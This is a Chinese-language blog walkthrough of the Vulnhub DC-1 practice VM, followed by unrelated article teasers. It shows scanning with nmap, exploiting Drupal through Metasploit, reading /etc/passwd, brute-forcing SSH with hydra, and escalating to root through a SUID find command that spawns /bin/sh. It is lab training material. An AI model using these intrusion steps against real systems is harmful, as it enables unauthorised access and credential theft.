您现在的位置是:首页 > 正文

Vulnhub靶机渗透测试实战(一):DC-1(入门) 热门推荐

2024-04-01 01:44:26阅读 3

关于Vulnhub

Vulnhub是一个特别好的渗透测试实战网站,提供了许多带有漏洞的渗透测试虚拟机下载。
新手入门DC-1:
下载地址:
https://www.vulnhub.com/entry/dc-1-1,292/

主机渗透系统:
macOS10.13

安装好虚拟机后挂载Virtualbox运行
局域网内主机发现
~ arp-scan -l

在这里插入图片描述
Cadmus Computer Systems 表示Virtualbox虚拟机

扫描主机
~ nmap -sV -p- 172.21.204.36

-sV 用来扫描目标主机和端口上运行的软件的版本
-p 80 指定80端口
-p- 扫描0-65535全部端口
在这里插入图片描述
发现开放80端口,则可以进行网页访问

访问主页 收集信息

在这里插入图片描述
*推荐使用插件Wappalyzer进行网站指纹识别
发现网站使用Drupal cms管理系统

使用Metasploit进行漏洞查找攻击

Metasploit 是很强大的漏洞查找工具

查找该cms相关漏洞

msf5 > search drupal

在这里插入图片描述
使用最新的漏洞尝试攻击
在这里插入图片描述
*选择使用某个脚本之后要使用show options命令查看脚本所需设定参数,一定要设定好required项是yes的参数,之后使用exploit命令进行攻击

Get shell!

看到提示Meterpreter session 1opened并出现

meterpreter > 

说明已经攻击成功

执行命令shell命令获得shell
在这里插入图片描述
ls 查看当前目录下文件
在这里插入图片描述
发现有flag1.txt文件
查看后并没有特别含义

查看用户信息

cat /etc/passwd

/etc/passwd 储存了用户重要信息,一般可读但不可写
推荐以下文章进行详细了解
https://www.cyberciti.biz/faq/understanding-etcpasswd-file-format/
在这里插入图片描述
尝试查看/etc/shadow 失败
*如果得知/etc/shadow 和 /etc/passwd 可以使用John the Ripper破解密码

/etc/shadow 敏感文件,储存加密后的用户密码(一般是哈希值)
推荐以下文章进行详细了解
https://www.cyberciti.biz/faq/understanding-etcshadow-file/

发现用户flag4可能有点问题,尝试爆破破解密码
这里使用hydra + John the Ripper的密码本进行爆破

~ hydra -l flag4 -P /Users/john-1.8.0/run/password.lst ssh://172.21.204.36

-l 指定用户名
-P 加载密码字典(这里使用了John the Ripper安装后提供的密码本,一般在john-1.8.0/run/password.lst)
ssh://ip 指定使用协议和ip地址
在这里插入图片描述
爆破后获得密码 orange

登录服务器

在这里插入图片描述
*ankit 文件是后续攻击中我自己创建的,本来只有flag4.txt文件
发现flag4.txt文件并不是真正储存flag的文件…sad…

回去看Vulnhub中DC-1的介绍

There are five flags in total, but the ultimate goal is to find and read the flag in root’s home directory. You don’t even need to be root to do this, however, you will require root privileges.

flag在root目录下,并且需要有root权限

**其实如果无法爆破出用户密码可以直接跳过登录服务器步骤,通过metasploit获得的shell中进行后续操作。

提权

要想有root权限:
1 以root账户登录(尝试使用爆破未果)
2 普通用户登录,查找具有suid权限位的命令去get shell
suid权限位:说明可以以root权限执行命令

flag4@DC-1:~$ find / -type f -perm -u=s 2>/dev/null

在这里插入图片描述
发现find命令被设置为suid权限位

flag4@DC-1:~$ touch getflag
flag4@DC-1:~$ find / -type f -name getflag -exec "whoami" \;
root
flag4@DC-1:~$ find / -type f -name getflag -exec "/bin/sh" \;
# cd /root
# ls
thefinalflag.txt
# cat thefinalflag.txt

touch getflag 创建文件名为getflag
find … exec “…” 查找文件后并执行命令
在这里插入图片描述
终于得到最终的flag~~!
但是过程中只拿到了两个flag文件,本来应该要找到5个…

是第一次发博客!希望自己之后可以坚持!共勉!
越努力越幸运鸭~

参考文章

https://cybrary.in/dc-1-1-vulnhub-walkthrough/

网站文章

  • 滑动窗口(字符串)-算法入门

    滑动窗口(字符串)-算法入门 滑动窗口概述 滑动窗口,大致就是维护一个区间去遍历一段数据,类似于双指针算法,那么用区间去遍历有什么好处吗?用一个区间去遍历的话,区间内会有原来的计算结果,避免重复计算,...

    2024-04-01 01:44:20
  • x86主机搭建家庭智能路由系统 ---- Proxmox虚拟化实现一机多用

    x86主机搭建家庭智能路由系统 ---- Proxmox虚拟化实现一机多用

    Proxmox VE简介 Proxmox VE(Proxmox Virtual Environment) 是一款完全开源虚拟化管理平台,可以管理QEMU/KVM虚拟机和LXC容器。事实上它只是一个前端管理界面,虚拟化技术由KVM和LXC提供。 安装Proxmox VE 首先到官网下载Promox VE的镜像文件。 下载地址:https://www.proxmox.com/en/downlo

    2024-04-01 01:43:57
  • 一文看懂用Python读取Excel数据

    一文看懂用Python读取Excel数据

    读:现有的Excel分为两种格式:xls(Excel 97-2003)和xlsx(Excel 2007及以上)。Python处理Excel文件主要是第三方模块库xlrd、xlwt、pyexcel-xl...

    2024-04-01 01:43:51
  • js判断值是否为空,null,undefined,为空返回true,不为空返回true

    function isEmpty(data){ var dataType = typeof(data);//typeof 返回的是字符串,有六种可能:”number”、”string”、”boolean”、”object”、”function”、”undefined” ; switch(dataType){ case “number”://数字 ...

    2024-04-01 01:43:45
  • 1024.Palindromic Number

    #include<iostream>using namespace std;bool judge(int* digit, int len) { for (int i = 0; i < len /...

    2024-04-01 01:43:19
  • 【超简易】网站ioc图标添加【超详细】

    步骤一: 选择一张适合的图,这张图片就是将来网站ico站标的雏形,图片的初始大小、格式(jpg,gif,png)没有要求。 步骤二: 利用在线生成ico图标的工具,在线生成ico站标。生成的ico站标...

    2024-04-01 01:43:11
  • 【笔记】pth、pt、pkl的区别:pt 常做数据集的数据存储形式

    在用torch.save()函数保存模型文件的时候,有些人喜欢用.pt后缀,有些人喜欢用.pth或 .pkl,用相同的 torch.save()语句保存出来的模型文件没有什么不同。另外,为什么会有 ....

    2024-04-01 01:43:04
  • sqoop1.99.7搭建和使用

    sqoop的主要功能是hdfs与关系型数据库的数据互相导入导出。我们以hdfs和mysql互相导数据为例现在我们开始搭建sqoop1.下载sqoop包   wget http://mirror.bit.edu.cn/apache/sqoop/1.99.7/sqoop-1.99.7-bin-hadoop200.tar.gz2.解压   tar -zxvf sqoo

    2024-04-01 01:42:39
  • Google中国2014校园招聘笔试Round A China New Grad Test Problem A. Read Phone Number

    Problem Do you know how to read the phone numbers in English? Now let me tell you. For example, In China, the phone numbers are 11 digits, like: 15012233444. Someone divides the numbers into 3-4-4 f

    2024-04-01 01:42:27
  • 简历有空窗期,怎么办?

    上一篇:“公司15号发工资”上热搜职业空窗期,是求职者几乎都有的时期。HR也是企业的员工,空窗期他们都能明白可能是多种原因造成的,比如家庭原因、健康状况、旅行、甚至今年特殊时期找不到工作,那为什么还会...

    2024-04-01 01:42:20